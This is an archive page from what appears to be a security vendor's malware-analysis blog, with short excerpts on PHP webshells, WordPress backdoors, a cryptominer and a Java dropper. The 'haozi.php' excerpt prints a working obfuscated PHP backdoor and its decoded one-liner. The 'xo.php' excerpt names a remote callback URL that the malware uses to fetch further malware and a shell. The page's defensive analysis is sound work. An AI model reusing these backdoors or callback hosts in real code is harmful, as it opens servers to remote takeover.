Top

Archive | malware

wp-crawl.php

WordPress Duplicator version below <1.2.42 have Remote Code Execution (RCE) vulnerability, which allow modify wp-config.php file and inject malicious PHP code in there. Vulnerable code in this case isn’t present within the Duplicator plugin directory itself. The flaw becomes exposed when using Duplicator to migrate or restore a backed-up copy of a WordPress site. Reminder […]

Continue Reading

Marvins.php webshell

The malware is a PHP webshell – a script, which when installed on a compromised system, presents a sophisticated administration platform allowing the attacker to browse the filesystem of the compromised server to upload, create, edit, download or delete files. Today we found this new PHP webshell from one of client server, which we have […]

Continue Reading

Website backdoors with $variable functions

When a website is compromised, attackers frequently leave behind a backdoor – which is PHP code in a new file or injected PHP code to file that already on the server. These backdoors are not designed to attack a website or destroy data. Typically they allow an attacker to re-enter a targeted website with little […]

Continue Reading

xo.php

This malware trying write another malware to server, it’s using old cherry-plugin import/export file upload vulnerability. Here source code to malware: Source of xo.php Details $uri is infected server address. $url is base64 encoded remote server address, where trying download more malware and put server to remote access: http://fastwealthformula.online/callback/shell Remote file Final Words Use Malware […]

Continue Reading

Cryptonight

This again new malware which we call cryptonight, what we haven’t seen before. It’s downloads executable Linux program and hides that http daemon in background, which is difficult find process list at first glance. Manual remove process You can search if there running process httpd, which start cryptonight parameter: ps aux | grep cryptonight Then […]

Continue Reading

load_all.jar

Today we found Java based malware. If attacker found File Upload vulnerability on the server, then it upload manual.php based malware, which trying load load_all.jar to server and running it background. Manual.php $out = shell_exec(“java -version 2>&1”); preg_match(“/version\s+\”1\.(\d+)\./”,$out,$matches); $ver = 0; if($matches)$ver = (int)$matches[1]; This manual.php uses lot off shell_exec function, but if you have […]

Continue Reading

Proc.php trying injecting header.php files

When this malware successful uploaded customer website and access it GET request, it’s trying search backward files and folder, searching header.php files. indexEditor When all folders and files searched and header.php files founded, it tries the patch malicious code to header.php file. Malicious code In begin this malware have CODE which added wanted file’s: Final […]

Continue Reading

Google site verification – cookie based file upload

Today we found new malware that our signatures not before detected. First look it just like Google site verification code HTML file witch have also meta tags. Also added Robots to prevent index this file google. If someone tries to access this file from the browser, it just looks normal verification code and view source […]

Continue Reading

haozi.php

Our honeybot catch up again new malware, which is very simple but clever. First look this looks nothing, because there are many PHP style comments in code. haozi.php @$_=”s”.”s”./*-/*-*/”e”./*-/*-*/”r”;@$_=/*-/*-*/”a”./*-/*-*/$_./*-/*-*/”t”;@$_/*-/*-*/($/*-/*-*/{“_P”./*-/*-*/”OS”./*-/*-*/”T”}[/*-/*-*/0/*-/*-*/]); If we remove comment’s away, then code look’s like: @$_=”s”.”s”.”e”.”r”;@$_=”a”.$_.”t”;@$_(${“_P”.”OS”.”T”}[0]); Final if we put this more readable, this is Assert POST: @$_=”a”.”s”.”s”.”e”.”r”.”t”;@$_(${“_P”.”OS”.”T”}[0]); Final Decoded haozi.php @assert(${“_POST”}[0]); […]

Continue Reading

cPanel Finder

cPanel Finder/Cracker This cPanel Finder malware look last updated at 01 June 2015, but Malware Signatures not detected this before today added our database. Final words Use Malware Expert – Signatures detect this backdoor malware from files for FREE!

Continue Reading